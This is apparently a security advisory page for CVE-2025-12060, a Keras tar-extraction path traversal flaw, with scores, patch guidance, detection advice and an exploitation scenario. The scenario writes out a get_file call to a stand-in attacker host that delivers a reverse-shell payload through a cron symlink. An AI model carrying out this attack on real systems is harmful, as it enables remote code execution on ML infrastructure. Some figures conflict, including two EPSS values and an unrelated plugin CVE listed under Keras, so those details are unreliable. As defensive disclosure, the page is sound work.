AI Threat Alert

CVE-2025-12060: keras: Path Traversal enables file access

GHSA-hjqc-jx6g-rwp9 CRITICAL PoC AVAILABLE
Published October 30, 2025
CISO Take

Upgrade Keras to 3.12.0 immediately — upgrading Python to 3.13.4 alone does NOT fix this, both components must be patched. Any ML pipeline calling keras.utils.get_file with extract=True against a remote or untrusted tar archive is exposed to arbitrary file write on the host filesystem, which trivially escalates to code execution. Audit all training and data ingestion automation for this pattern before your next pipeline run.

What is the risk?

Critical risk for ML training infrastructure despite low current EPSS (0.00122). The CVSS 9.8 reflects zero prerequisites: no authentication, no privileges, no user interaction, fully network-exploitable. Real-world risk is highest in automated MLOps pipelines that fetch and extract remote datasets — an extremely common pattern. The dual-fix requirement (Python AND Keras must both be updated) creates high probability of incomplete remediation, leaving patched-feeling environments still vulnerable.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Keras pip <= 3.11.3 3.12.0
64.1K OpenSSF 7.1 1.6K dependents Pushed 4d ago 48% patched ~32d to patch Full package profile →

Do you use Keras? You're affected.

How severe is it?

CVSS 3.1
9.8 / 10
EPSS
0.6%
chance of exploitation in 30 days
Higher than 42% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

What should I do?

5 steps

  1. PATCH

    pip install 'keras>=3.12.0' — Python upgrade alone is NOT sufficient, both must be updated.

  2. AUDIT

    Search all codebases and pipeline configs for keras.utils.get_file calls with extract=True; flag any that pull from external or untrusted URLs.

  3. WORKAROUND (if patching delayed): Download tar files separately, validate with tarfile.extractall(filter='data') before processing.

  4. ISOLATE

    Run ML training in containers with AppArmor/seccomp profiles and filesystem mounts restricted to expected data directories.

  5. DETECT

    Alert on filesystem writes outside designated ML data directories during training jobs — unexpected writes to /etc, /usr, ~/.ssh, or Python site-packages during an ML run indicate active exploitation.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Supply Chain Code Execution Framework Training Data AML.T0010.001 AML.T0010.002 AML.T0011 AML.T0049

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.6.2 - Responsibilities related to AI system suppliers A.9.1 - AI system vulnerability handling
NIST AI RMF
GOVERN 1.1 - Policies and processes are in place to manage AI risks MANAGE 2.2 - Mechanisms are in place to sustain value of deployed AI systems
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-12060?

Upgrade Keras to 3.12.0 immediately — upgrading Python to 3.13.4 alone does NOT fix this, both components must be patched. Any ML pipeline calling keras.utils.get_file with extract=True against a remote or untrusted tar archive is exposed to arbitrary file write on the host filesystem, which trivially escalates to code execution. Audit all training and data ingestion automation for this pattern before your next pipeline run.

Is CVE-2025-12060 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-12060, increasing the risk of exploitation.

How to fix CVE-2025-12060?

1. PATCH: pip install 'keras>=3.12.0' — Python upgrade alone is NOT sufficient, both must be updated. 2. AUDIT: Search all codebases and pipeline configs for keras.utils.get_file calls with extract=True; flag any that pull from external or untrusted URLs. 3. WORKAROUND (if patching delayed): Download tar files separately, validate with tarfile.extractall(filter='data') before processing. 4. ISOLATE: Run ML training in containers with AppArmor/seccomp profiles and filesystem mounts restricted to expected data directories. 5. DETECT: Alert on filesystem writes outside designated ML data directories during training jobs — unexpected writes to /etc, /usr, ~/.ssh, or Python site-packages during an ML run indicate active exploitation.

What systems are affected by CVE-2025-12060?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data ingestion pipelines, MLOps automation, model serving.

What is the CVSS score for CVE-2025-12060?

CVE-2025-12060 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.56%.

What is the AI security impact?

Affected AI Architectures

training pipelinesdata ingestion pipelinesMLOps automationmodel serving

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.002 Data
AML.T0011 User Execution
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: A.6.2, A.9.1
NIST AI RMF: GOVERN 1.1, MANAGE 2.2
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python's tarfile.extractall function without the filter="data" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517. Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).

Exploitation Scenario

Adversary hosts a malicious dataset archive at a URL that appears legitimate — either via a typosquatted dataset mirror, a compromised data host, or a man-in-the-middle on an HTTP download. An MLOps pipeline or data scientist calls keras.utils.get_file('https://attacker-host/imagenet-subset.tar.gz', extract=True). The tar archive contains a symlink entry resolving to /etc/cron.d/ml-runner, followed by a file entry that writes a reverse shell payload to that symlink target. Keras calls tarfile.extractall without filter='data', the symlink resolves outside the destination, and the payload lands on the host. On next cron tick, the attacker has RCE as the ML training user — often with GPU cluster access, model weights, and training data.

Weaknesses (CWE)

CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Primary CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

  • [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
  • [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published
October 30, 2025
Last Modified
December 2, 2025
First Seen
October 30, 2025

Related Vulnerabilities

CRITICAL CVE-2025-49655 9.8

keras: Deserialization enables RCE

Same package: keras
CRITICAL CVE-2025-1550 9.8

Keras: safe_mode bypass enables RCE via model loading

Same package: keras
CRITICAL CVE-2024-3660 9.8

Keras: RCE via malicious model deserialization

Same package: keras
CRITICAL CVE-2024-49326 9.8

Affiliator WP Plugin: Unauthenticated Web Shell Upload

Same package: keras
HIGH CVE-2026-1462 8.8

Keras: safe_mode bypass allows RCE via model deserialization

Same package: keras
Back to Threat Feed